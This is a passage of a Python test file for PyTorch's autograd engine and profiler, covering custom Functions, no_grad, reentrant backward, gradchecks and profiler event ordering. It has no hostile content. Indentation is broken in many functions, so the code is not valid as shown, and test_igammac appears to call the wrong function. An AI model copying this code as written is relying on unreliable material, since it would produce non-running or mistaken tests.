            self._test_type_conversion_backward(lambda x: x.cuda(0))
            self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
    """Backward works when a branch of the graph is non-differentiable (argmax indices)."""
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=True)
    a = x + y
    b = torch.max(a, 1, True)[1].repeat(1, 5).double()
    o = (b + a).sum()
    o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
    """Calling numpy() on a grad-requiring tensor errors; no_grad does not lift that."""
    x = torch.randn(2, 2, requires_grad=True)
    err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
    with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
        x.numpy()
    with torch.no_grad():
        x.numpy()
    x = torch.randn(2, 2)
    x.numpy()
    with torch.no_grad():
        x.numpy()
def test_return_leaf(self):
    """A Function output aliasing an input still hooks correctly into the graph."""
    class Identity(Function):
        @staticmethod
        def forward(ctx, a, b):
            return a, a + b

        @staticmethod
        def backward(ctx, grad_a, grad_b):
            return grad_a + grad_b, grad_b

    hook_called = [False]
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=True)
    q, p = Identity.apply(x, y)
    # Make sure hooks only receive grad from usage of q, not x.
    def hook(grad):
        hook_called[0] = True
        self.assertEqual(grad, torch.ones(5, 5))
    q.register_hook(hook)
    (q + p + x).sum().backward()
    self.assertEqual(x.grad, torch.ones(5, 5) * 3)
    self.assertEqual(y.grad, torch.ones(5, 5))
    self.assertTrue(hook_called[0])
def test_return_leaf_inplace(self):
    """Dirtying a non-grad input in-place returns the same object wired into the graph."""
    class Inplace(InplaceFunction):
        @staticmethod
        def forward(ctx, a, b):
            ctx.mark_dirty(a)
            return a.add_(b), b + 2

        @staticmethod
        def backward(ctx, grad_a, grad_b):
            return grad_a, grad_a + grad_b

    x = torch.randn(5, 5)
    y = torch.randn(5, 5, requires_grad=True)
    q, p = Inplace.apply(x, y)
    self.assertIs(q, x)
    self.assertIs(q.grad_fn.__class__, Inplace._backward_cls)
    self.assertTrue(q.requires_grad)
    q.sum().backward()
    self.assertEqual(y.grad, torch.ones(5, 5))
def test_leaf_assignment(self):
x = torch.randn(5, 5)
y = torch.randn(5, requires_grad=True)
z = torch.randn(5, requires_grad=True)
x[0] = y
x[1] = 2 * z
self.assertTrue(x.requires_grad)
self.assertIsNot(x.grad_fn, None)
x.sum().backward()
self.assertEqual(y.grad, torch.ones(5))
self.assertEqual(z.grad, torch.ones(5) * 2)
def test_no_grad_assignment(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5)
with torch.no_grad():
x[0] = y
self.assertTrue(x.requires_grad)
self.assertIsNone(x.grad_fn)
def test_no_grad_modifies_version(self):
    """In-place ops under no_grad still bump the version counter, so later backward errors."""
    x = torch.randn(5, requires_grad=True)
    y = torch.randn(5, requires_grad=True)
    z = (x * y).sum()
    with torch.no_grad():
        x *= 2
    self.assertRaisesRegex(RuntimeError, 'modified by an inplace operation',
                           lambda: z.backward())
def test_no_grad_input(self):
    """Applying a custom Function under no_grad produces an output with no grad_fn."""
    class MyFunction(Function):
        @staticmethod
        def forward(self, x):
            return x

        @staticmethod
        def backward(self, grad_output):
            return grad_output

    x = torch.randn(5, requires_grad=True)
    with torch.no_grad():
        y = MyFunction.apply(x)
    self.assertTrue(x.requires_grad)
    self.assertIsNone(y.grad_fn)
def test_backward_copy(self):
    # This tests checks backward engine for a very subtle bug that appeared
    # in one of the initial versions of autograd. Gradients tensors were
    # simply stored in lists while the function waited for all its gradients
    # to be computed. However, sometimes an output was used multiple times,
    # so the gradients needed to be summed. Engine used to keep a need_copy
    # set of tensors that will need a clone upon next addition and removed
    # them from the set as soon as the clone was performed. However, this
    # could lead to incorrect results if the same gradient tensor was
    # buffered in three places in the graph:
    # 1. When accumulating gradients in one of these places it was cloned
    #    and removed from need_copy set.
    # 2. When accumulating in second place, it wasn't in the need_copy set,
    #    so the gradients were simply accumulated in-place (which already
    #    modified the grad in 3rd place)
    # 3. When accumulating in the third place, it wasn't in the need_copy set
    #    as well, so the incoming gradient was summed in-place, yielding
    #    incorrect results in all functions, except the first one.
    x = torch.ones(5, 5, requires_grad=True)
    y = torch.ones(5, 5, requires_grad=True)
    # Simulate that we're in the middle of the graph
    a = x + 2
    b = y + 2
    c = x + 2
    # This op will just return grad_output two times in backward
    add1 = a + b
    add2 = add1 + c
    # Simulate a long branch, so grad_output will get buffered.
    for _ in range(4):
        a = a * 2
        b = b * 2
        c = c * 2
    branch = a + b + c
    out = add2 + branch
    # expected gradients are:
    # for x: 34 (16 from final a, 16 from final c, 2 from add2)
    # for y: 17 (16 from final b, 1 from add2)
    grad_output = torch.ones(5, 5)
    out.backward(grad_output)
    self.assertEqual(x.grad, torch.ones(5, 5) * 34)
    self.assertEqual(y.grad, torch.ones(5, 5) * 17)
def test_save_none_for_backward(self):
    """save_for_backward tolerates None entries and hands them back as None."""
    test_case = self

    class MyFn(Function):
        @staticmethod
        def forward(ctx, input):
            ctx.save_for_backward(None, input, None)
            return input * input

        @staticmethod
        def backward(ctx, grad_output):
            n1, input, n2 = ctx.saved_tensors
            test_case.assertIsNone(n1)
            test_case.assertIsNone(n2)
            return 2 * input * grad_output

    x = torch.randn(5, 5, requires_grad=True)
    y = MyFn.apply(x)
    y.sum().backward()
    self.assertEqual(x.grad, 2 * x)
def test_too_many_grads(self):
    """Extra None gradients returned from backward are silently ignored."""
    class MyFn(Function):
        @staticmethod
        def forward(ctx, input):
            return input

        @staticmethod
        def backward(ctx, grad_output):
            return grad_output, None, None

    x = torch.randn(5, 5, requires_grad=True)
    y = MyFn.apply(x)
    y.sum().backward()
    self.assertEqual(x.grad, torch.ones_like(x))
def test_pickle(self):
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=False)
def assert_strict_equal(var1, var2):
self.assertEqual(var1, var2)
self.assertEqual(var1.requires_grad, var2.requires_grad)
serialized = [pickle.dumps([x, y], protocol=p) for p in range(3)]
for dump in serialized:
xc, yc = pickle.loads(dump)
assert_strict_equal(xc, x)
assert_strict_equal(yc, y)
def test_dep_nograd(self):
    """A non-differentiable side output feeding another Function must not break backward."""
    class F1(Function):
        @staticmethod
        def forward(ctx, input):
            out = torch.randn(input.size())
            ctx.mark_non_differentiable(out)
            return input, out

        @staticmethod
        def backward(ctx, grad_output, ignored):
            return grad_output

    class F2(Function):
        @staticmethod
        def forward(ctx, input, ignored):
            return input

        @staticmethod
        def backward(ctx, grad_output):
            return grad_output, None

    x = torch.randn(5, requires_grad=True)
    a, b = F1.apply(x)
    b = b + 1  # separate F1 from F2 by another op
    self.assertTrue(a.requires_grad)
    self.assertFalse(b.requires_grad)
    c = F2.apply(a, b)
    c.backward(torch.ones(c.size()))
    self.assertEqual(x.grad, torch.ones(x.size()))
def test_set_grad_enabled(self):
x = torch.tensor([1.], requires_grad=True)
with torch.set_grad_enabled(False):
y = x * 2
self.assertFalse(y.requires_grad)
with torch.set_grad_enabled(True):
y = x * 2
self.assertTrue(y.requires_grad)
with torch.set_grad_enabled(False):
torch.set_grad_enabled(True)
y = x * 2
self.assertTrue(y.requires_grad)
def test_simple_reentrant(self):
    """A Function whose backward itself calls backward (reentrant autograd)."""
    y_data = torch.randn(2, 2)

    class Reenter(Function):
        @staticmethod
        def forward(ctx, x):
            with torch.enable_grad():
                ctx.x = Variable(x, requires_grad=True)
                ctx.y = Variable(y_data, requires_grad=True)
                ctx.output_var = ctx.x * ctx.y
            return ctx.output_var.detach()

        @staticmethod
        def backward(ctx, grad_output):
            with torch.enable_grad():
                ctx.output_var.sum().backward()
            return ctx.x.grad * grad_output

    # NOTE(review): original comment said "Reentrant starts on CPU thread,
    # finishes on GPU thread", but this test runs entirely on CPU — confirm.
    x = torch.randn(2, 2, requires_grad=True)
    out = Reenter.apply(x)
    out.sum().backward()
    self.assertEqual(x.grad, y_data)
def test_reentrant_child_error(self):
    """An error raised inside a reentrant (child) backward must propagate to the parent."""
    # Parent graph.
    a = torch.rand(3, 3, requires_grad=True)
    c = a * a
    # Reentrant child graph.
    b = torch.rand(3, 3, requires_grad=True)
    e = b * b
    f = TestAutograd.SimulateBackwardError.apply(e)
    reentrant_root = f.sum()

    class ReentrantFunc(Function):
        @staticmethod
        def forward(ctx, inp):
            return inp.clone()

        @staticmethod
        def backward(ctx, grad):
            # Reentrant backward in child will throw an error.
            reentrant_root.backward()
            return grad

    d = ReentrantFunc.apply(c)
    with self.assertRaisesRegex(Exception, 'Simulate error'):
        d.sum().backward()
# TODO: Create OpInfos for these ops
def test_broadcast_tensors(self):
    """gradcheck broadcast_tensors across mixed-rank inputs."""
    f_args_variable = (torch.randn(3, dtype=torch.double, requires_grad=True),
                       torch.randn(1, 2, 1, dtype=torch.double, requires_grad=True),
                       torch.randn(1, 1, dtype=torch.double, requires_grad=True),
                       torch.randn(5, 1, 1, dtype=torch.double, requires_grad=True))
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_broadcast_tensors", "broadcast",
                          lambda a, b, c, d: torch.broadcast_tensors(a, b, c, d),
                          True, f_args_variable, f_args_tensor)
def test_block_diag(self):
    """gradcheck block_diag over inputs with differing first dimensions."""
    f_args_variable = (torch.randn(1, S, dtype=torch.double, requires_grad=True),
                       torch.randn(2, S, dtype=torch.double, requires_grad=True),
                       torch.randn(3, S, dtype=torch.double, requires_grad=True))
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_block_diag", "block_diag",
                          lambda a, b, c: torch.block_diag(a, b, c),
                          True, f_args_variable, f_args_tensor)
def test_cat(self):
    """gradcheck cat along dim 0 (including forward-mode AD)."""
    f_args_variable = (torch.randn(1, S, S, dtype=torch.double, requires_grad=True),
                       torch.randn(2, S, S, dtype=torch.double, requires_grad=True),
                       torch.randn(3, S, S, dtype=torch.double, requires_grad=True),
                       0)
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat", "cat",
                          lambda a, b, c, dim: torch.cat((a, b, c), dim),
                          True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_1(self):
    """gradcheck cat along dim -1."""
    f_args_variable = (torch.randn(S, S, 1, dtype=torch.double, requires_grad=True),
                       torch.randn(S, S, 2, dtype=torch.double, requires_grad=True),
                       torch.randn(S, S, 3, dtype=torch.double, requires_grad=True),
                       -1)
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat_negdim_1", "cat",
                          lambda a, b, c, dim: torch.cat((a, b, c), dim),
                          True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_negdim_2(self):
    """gradcheck cat along dim -2."""
    f_args_variable = (torch.randn(S, 1, S, dtype=torch.double, requires_grad=True),
                       torch.randn(S, 2, S, dtype=torch.double, requires_grad=True),
                       torch.randn(S, 3, S, dtype=torch.double, requires_grad=True),
                       -2)
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat_negdim_2", "cat",
                          lambda a, b, c, dim: torch.cat((a, b, c), dim),
                          True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_cat_empty_legacy(self):
    """gradcheck cat with a legacy zero-dim-size empty tensor."""
    f_args_variable = (torch.randn(0, dtype=torch.double, requires_grad=True),
                       torch.randn(S, S, dtype=torch.double, requires_grad=True))
    # gradgradcheck doesn't work, probably because legacy size tracking is wrong somewhere,
    # hence False passed below, but gradcheck checked explicitly.
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat_empty_legacy", "cat",
                          lambda a, b: torch.cat((a, b)),
                          False, f_args_variable, f_args_tensor, check_forward_ad=True)
    self.assertTrue(gradcheck(lambda a, b: torch.cat((a, b)), f_args_variable, eps=1e-6, atol=PRECISION))
def test_cat_empty(self):
    """gradcheck cat with a (0, S)-shaped empty tensor."""
    f_args_variable = (torch.randn(0, S, dtype=torch.double, requires_grad=True),
                       torch.randn(S, S, dtype=torch.double, requires_grad=True))
    f_args_tensor = deepcopy(unpack_variables(f_args_variable))
    run_functional_checks(self, "test_cat_empty", "cat",
                          lambda a, b: torch.cat((a, b)),
                          True, f_args_variable, f_args_tensor, check_forward_ad=True)
def test_var_mean_differentiable(self):
    """Fused var_mean must match separate var()/mean() in value and gradient."""
    dim = [2, 4]
    keepdim = False
    input1 = torch.randn(3, 4, 5, 6, 2, 3, requires_grad=True)
    input2 = deepcopy(input1)
    var1, mean1 = torch.var_mean(input1, dim=dim, keepdim=keepdim)
    var2 = input2.var(dim=dim, keepdim=keepdim)
    mean2 = input2.mean(dim=dim, keepdim=keepdim)
    grad = torch.randn(3, 4, 6, 3, requires_grad=True)
    r1 = var1 * var1 * mean1 * mean1
    r2 = var2 * var2 * mean2 * mean2
    self.assertTrue(torch.allclose(r1, r2, rtol=0.01, atol=0.0))
    torch.autograd.backward(r1, grad)
    torch.autograd.backward(r2, grad)
    self.assertTrue(torch.allclose(input1.grad, input2.grad, rtol=0.01, atol=0.0))
@slowTest
@skipIfNoLapack
def test_lobpcg(self):
    """gradcheck/gradgradcheck torch.lobpcg; eigenvector signs are normalized
    because they are otherwise non-deterministic."""
    def func(k, A, largest=True, B=None):
        X_shape = list(A.shape)
        X_shape[-1] = k
        X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
        if A.dim() > 2:
            X = X.expand(X_shape)
        D, U = torch.lobpcg(A=A, k=k, B=B, X=X)
        # LOBPCG uses a random initial eigenspace approximation
        # if parameter `X` is not provided.
        # This may cause a non-deterministic behavior
        # when it comes to the sign of an eigenvector
        # (note if v is an eigenvector, so is -v),
        # hence we eliminate this non-determinism
        # by making sure that each column of U
        # gets multiplied by the sign of its max (in absolute value) element.
        # Also, gradcheck changes the content of the input by +/- eps (default to 1e-06)
        # to compute the numerical gradient which can also cause the signs to flip.
        _, idx = U.abs().max(-2, keepdim=True)
        sign = U.gather(-2, idx).sign()
        U = U * sign
        return D, U

    # TODO: review if this can be ported to OpInfos or moved to test_linalg.py
    def run_symeig_test(k, sizes, largest=True):
        # Build a symmetric positive semi-definite input.
        A = torch.rand(*sizes).double()
        A = A.matmul(A.transpose(-1, -2)) / 10
        A.requires_grad_(True)
        gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)
        # Custom gradient vectors for better stability due to some
        # non-determinism in the lobpcg's forward.
        # Note it is not required if symeig is in forward instead (tested).
        D_grad = torch.rand(*A.shape[:-2], k) / 100
        U_grad = torch.rand(*A.shape[:-1], k) / 100
        gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)
        # check whether A.grad is symmetric
        A = A.detach().requires_grad_(True)
        D, U = func(k, A, largest)
        (D.sum() + U.sum()).backward()
        self.assertEqual(A.grad, A.grad.transpose(-1, -2))

    # the tests below take about 1-2 minutes to finish,
    # but we want to be extra sure that the backward is correct.
    for largest in [True, False]:
        run_symeig_test(1, (6, 6), largest=largest)
        run_symeig_test(1, (2, 6, 6), largest=largest)
        run_symeig_test(1, (2, 2, 6, 6), largest=largest)
        run_symeig_test(2, (6, 6), largest=largest)
        run_symeig_test(2, (2, 6, 6), largest=largest)
        run_symeig_test(2, (2, 2, 6, 6), largest=largest)
        run_symeig_test(3, (9, 9), largest=largest)
        run_symeig_test(3, (2, 9, 9), largest=largest)
        run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
    """GC traversal of the autograd graph must not free intermediates still in use."""
    def get_out_and_unrefed_cycle():
        inp = torch.randn(10, requires_grad=True)
        tmp = inp.view(10, 1)
        out = tmp.view(10)
        # Create a reference cycle that contains an
        # intermediary Variable in the graph
        my_list = []
        my_list.append(tmp)
        my_list.append(my_list)
        return out

    out = get_out_and_unrefed_cycle()
    gc.collect()
    # This will segfault if things have been erroneously released
    out.backward(torch.randn(out.size()))
def test_maximum_and_minimum_subgradient(self):
def run_test(f, a, b, expected_a_grad, expected_b_grad):
a = torch.tensor(a, requires_grad=True)
b = torch.tensor(b, requires_grad=True)
z = f(a, b)
z.sum().backward()
self.assertEqual(a.grad, expected_a_grad)
self.assertEqual(b.grad, expected_b_grad)
run_test(torch.maximum, [0., 1., 2.], [1., 1., 1.], [0., 0.5, 1.], [1., 0.5, 0.])
run_test(torch.minimum, [0., 1., 2.], [1., 1., 1.], [1., 0.5, 0.], [0., 0.5, 1.])
# TODO: norm is deprecated, update these tests and port them to OpInfos
# or test_linalg.py
def test_norm_subgradient(self):
def run_test(input_size, norm_deg):
input = torch.zeros(*input_size, requires_grad=True)
input.norm(norm_deg).backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), 2)
run_test((10, 10), 2)
run_test((10,), 3)
run_test((10,), 1)
run_test((10,), 1.5)
run_test((10,), inf)
def test_norm_inf_subgradient(self):
def run_test(input, expected, dim=None):
x = torch.tensor(input, requires_grad=True)
out = x.norm(inf, dim=dim, keepdim=True)
out.backward(torch.ones(out.size()))
self.assertEqual(x.grad, expected)
run_test([0., 0., 0.], [0., 0., 0.])
run_test([1., 0., 1.], [0.5, 0., 0.5])
run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]])
run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,))
run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_pow_scalar_base(self):
a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_()
gradcheck(lambda a: torch.pow(2, a), (a,))
def test_sinc(self):
# The derivative of sinc(x) at x=0 has to be special cased.
# A naive computation will result in 0/0 -> NaN.
# We also need to be careful when we are very close to 0, as the
# derivative's denominator is squared, and there are some floats
# that are positive and whose squares are zero.
a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0],
dtype=torch.double,
requires_grad=True)
gradcheck(torch.sinc, a)
def test_igamma(self):
# 1e-3 offset to avoid zeros
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double) + 1e-3).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_igammac(self):
# 1e-3 offset to avoid zeros in s
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double)).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_profiler(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
self.assertTrue(torch.autograd._profiler_enabled())
y = x * 2 + 4
self.assertFalse(torch.autograd._profiler_enabled())
names = ['aten::mul', 'aten::add']
found_indices = set()
for evt in p.function_events:
if evt.name in names:
found_indices.add(names.index(evt.name))
self.assertEquals(len(found_indices), len(names))
    def test_profiler_seq_nr(self):
        """Check profiler sequence numbers: each forward op (aten::add,
        aten::sum) appears once with a distinct non-negative sequence number,
        its corresponding backward node carries the same number, and nested
        ops (aten::empty) carry no sequence number (-1)."""
        with profile(use_kineto=kineto_available()) as p:
            x = torch.randn(10, 10, requires_grad=True)
            y = torch.randn(10, 10, requires_grad=True)
            z = x + y
            s = z.sum()
            s.backward()
        print(p.key_averages().table(
            sort_by="self_cpu_time_total", row_limit=-1))
        # expecting aten::add, aten::sum to have the sequence numbers,
        # expecting the corresponding backward nodes to have the same numbers
        # as the forward ops
        add_seq_nr = -1
        sum_seq_nr = -1
        found_add = found_sum = False
        found_bwd_add = found_bwd_sum = False
        found_empty = False
        for e in p.function_events:
            # each forward op must appear exactly once
            if e.name == "aten::add":
                add_seq_nr = e.sequence_nr
                self.assertFalse(found_add)
                found_add = True
            elif e.name == "aten::sum":
                sum_seq_nr = e.sequence_nr
                self.assertFalse(found_sum)
                found_sum = True
            elif "Add" in e.name and "Backward" in e.name:
                # backward node shares the forward op's sequence number
                self.assertEqual(e.sequence_nr, add_seq_nr)
                self.assertFalse(found_bwd_add)
                found_bwd_add = True
            elif "Sum" in e.name and "Backward" in e.name:
                self.assertEqual(e.sequence_nr, sum_seq_nr)
                self.assertFalse(found_bwd_sum)
                found_bwd_sum = True
            # check that nested ops (e.g. empty) don't have
            # sequence number
            if e.name == "aten::empty":
                self.assertEqual(e.sequence_nr, -1)
                found_empty = True
        self.assertGreaterEqual(add_seq_nr, 0)
        self.assertGreaterEqual(sum_seq_nr, 0)
        self.assertNotEqual(add_seq_nr, sum_seq_nr)
        self.assertTrue(found_add)
        self.assertTrue(found_sum)
        self.assertTrue(found_bwd_add)
        self.assertTrue(found_bwd_sum)
        self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
x = torch.rand(3, 4)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
x.resize_([3, 2])
    def test_profiler_propagation(self):
        """Check that profiler state propagates across torch.jit._fork: scopes
        opened before the fork ("in_foo"), inside the forked fn, and after the
        wait ("in_bar_after_wait") must all be recorded exactly once."""
        def foo(x):
            with record_function("in_foo") as rf:
                return x * 2
        x = torch.rand(3, 4)
        traced_foo = torch.jit.trace(foo, x)
        def bar(x):
            with record_function("in_bar") as rf:
                # we expect that profiler will be able
                # propagate across fork
                fut = torch.jit._fork(traced_foo, x)
                y = torch.jit._wait(fut)
                # note: continuation (and rf's end) can
                # be executed in a different thread
                with record_function("in_bar_after_wait") as rf2:
                    y = y * 2
                return y
        traced_bar = torch.jit.trace(bar, x)
        with profile(use_kineto=kineto_available()) as p:
            traced_bar(x)
        found_foo = False
        found_bar = False
        found_bar_after_wait = False
        # each named scope must appear exactly once in the recorded events
        for info in p.function_events:
            if info.name == "in_foo":
                self.assertFalse(found_foo)
                found_foo = True
            elif info.name == "in_bar":
                self.assertFalse(found_bar)
                found_bar = True
            elif info.name == "in_bar_after_wait":
                self.assertFalse(found_bar_after_wait)
                found_bar_after_wait = True
        self.assertTrue(found_foo)
        self.assertTrue(found_bar)
        self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
x = torch.randn(10, 10)
with profile(use_kineto=kineto_available()) as p:
with record_function("foo"):
y = x * 2 + 4
function_events = p.function_events
foo_event = [event for event in function_events if "foo" in event.name][0]
self.assertEqual(foo_event.count, 1)
def test_profiler_aggregation_fake(self):
events = EventList()
id = [0]
def get_id():
id[0] = id[0] + 1
return id[0]
# [[thread_id, [(start, end, id), ....]], ...]
# Using list instead of a dict so order is guaranteed for any Python
# version
threads = [
[1, [(0, 1, get_id()), (1, 2, get_id())]],
[0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
]
for thread, ranges in threads:
for range in ranges:
assert(len(range) == 3)
events.append(
FunctionEvent(
id=range[2],
node_id=0,
name="",
thread=thread,
start_us=range[0],
end_us=range[1],
)
)
events._populate_cpu_children()
# Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
# as a child of [1, 3]
res = [[], [], [], [], [4]]
def get_children_ids(event):
return [child.id for child in event.cpu_children]
assert([get_children_ids(event) for event in events] == res)
def test_profiler_aggregation_table(self):
"""
Test if the profiling result is aggregated for `str(prof)`
See: https://github.com/pytorch/pytorch/issues/37500
"""
x = torch.randn(1024)
with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
torch.einsum("i->", x)
prof_str = str(prof)
prof_table = prof.table()
self.assertEqual(prof_table, prof_str)
def test_profiler_function_event_avg(self):
avg = FunctionEventAvg()
avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
avg.add(avg)
self.assertEqual(avg.key, "foo")
# aggregate stats
self.assertEqual(avg.count, 4)
self.assertEqual(avg.cpu_time_total, 30)
self.assertEqual(avg.self_cpu_time_total, 30)
self.assertEqual(avg.cuda_time_total, 0)
# average stats
self.assertEqual(avg.cpu_time, 7.5)
self.assertEqual(avg.cuda_time_total, 0)
def test_profiler_shapes(self):
print("")
layer1 = torch.nn.Linear(20, 30)
layer2 = torch.nn.Linear(30, 40)
input = torch.randn(128, 20)
with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
layer2(layer1(input))
print(prof.function_events)
linear_expected_shapes = [
[[128, 20], [30, 20], [30]],
[[128, 30], [40, 30], [40]],
]
found_indices = set()
for event in prof.function_events:
if event.name == "aten::linear":
self.assertTrue(event.input_shapes in linear_expected_shapes)
found_indices.add(linear_expected_shapes.index(event.input_shapes))
self.assertEqual(len(found_indices), len(linear_expected_shapes))
    def test_profiler_aggregation_lstm(self):
        """Profile 20 LSTM forward passes, print the aggregated tables in
        several configurations, compare python-side wall time against the
        profiler's total, and (except on Windows) export a chrome trace."""
        print("")
        rnn = torch.nn.LSTM(10, 20, 2)
        total_time_s = 0
        with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
            for i in range(20):
                input = torch.randn(5, 3, 10)
                h = torch.randn(2, 3, 20)
                c = torch.randn(2, 3, 20)
                start = time.time()
                rnn(input, (h, c))
                end = time.time()
                total_time_s += end - start
        # exercise the various table configurations
        print(prof.table(
            sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
        print(prof.key_averages(group_by_input_shape=True).table(
            sort_by="self_cpu_time_total", row_limit=10))
        print(prof.table(
            sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
        print(prof.key_averages(group_by_input_shape=True).table(
            sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))
        total_time_us = total_time_s * 1000.0 * 1000.0  # make it us which is profiler default
        print(
            "Total time based on python measurements: ",
            _format_time(total_time_us)
        )
        print(
            "CPU time measurement python side overhead: {:.2f}%".format(
                (total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
            )
        )
        # NamedTemporaryFile reopening does not work on Windows, so skip there
        if sys.platform != "win32":
            with tempfile.NamedTemporaryFile() as trace_file:
                prof.export_chrome_trace(trace_file.name)
    def test_record_function(self):
        """record_function scopes ("outer"/"inner") must appear in the profile
        interleaved in the right order with the aten ops they wrap; the
        decorator form must also be recorded."""
        x = torch.randn(10, 10)
        def forward(x):
            with record_function("outer"):
                y = x * 2 + 4
                with record_function("inner"):
                    y = y - 1
            y = y / 1
        forward(x)
        with profile(use_kineto=kineto_available()) as p:
            forward(x)
        events = p.function_events
        # expected event names, in recording order
        important_events = [
            'outer',
            'aten::mul',
            'aten::add',
            'inner',
            'aten::sub',
            'aten::div'
        ]
        # scan for the expected names as an ordered subsequence of events
        idx = 0
        for info in events:
            if info.name == important_events[idx]:
                idx = idx + 1
            if idx == len(important_events):
                break
        self.assertEqual(idx, len(important_events))
        # We can also use record_function to decorate arbitrary function
        @record_function('my_func')
        def f(x, y):
            return x + y
        with profile(use_kineto=kineto_available()) as p:
            f(1, 2)
        self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
rf = record_function("outer")
rf.__enter__()
with record_function("inner"):
# test that exiting the record function after starting another one
# doesn't throw.
rf.__exit__(None, None, None)
with record_function("inner"):
rf.__enter__()
# test that exiting the record function after ending another one
# doesn't throw.
rf.__exit__(None, None, None)
def test_dir(self):
x = torch.randn(10, 10)
keys = dir(x)
self.assertIn('shape', keys)
# real and imag are only implemented for complex tensors.
y = torch.randn(10, 10, dtype=torch.cfloat)
for key in ['real', 'imag']:
self.assertRaises(RuntimeError, lambda: hasattr(x, key))
self.assertTrue(hasattr(y, key))
keys.remove(key)
for key in keys:
self.assertTrue(hasattr(x, key))
    def test_as_strided(self):
        """Gradcheck as_strided over expand, overlap, transpose and offset
        cases, guarding each case against accidentally resizing storage."""
        def test(x, prepro_fn, size, strides, offset=None):
            x = x.to(torch.double).detach().requires_grad_()
            # Check that forward will **not** resize storage because it may
            # cause NaN in output and fail numerical Jacobian check consequently
            with torch.no_grad():
                y = prepro_fn(x) if prepro_fn is not None else x
                # largest element index reachable with this size/stride/offset
                max_offset = sum((si - 1) * st for si, st in zip(size, strides))
                max_offset += offset if offset is not None else y.storage_offset()
                assert max_offset < len(y.storage()), "test case resizes storage"
            def closure(x):
                if prepro_fn is not None:
                    x = prepro_fn(x)
                return x.as_strided(size, strides, offset)
            gradcheck(closure, [x])
            gradgradcheck(closure, [x])
        # test
        test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2)
        # test crazy stride at dim with size 1 case
        test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2)
        # test expand case
        test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2)
        test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4)
        test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0)
        # test non-expand overlapping case
        test(torch.randn(35), None, [6, 6], [5, 1], 2)
        test(torch.randn(15), None, [3, 2], [3, 6], 2)
        # test transpose case
        test(torch.randn(3, 4), None, [4, 3], [1, 4])
        # test "getting things outside the input" case
        x = torch.randn(6, 2)
        test(x[3:], None, [3, 2], [2, 1], 0)  # should be all zeros
        self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3])
        # test select on expanded input case
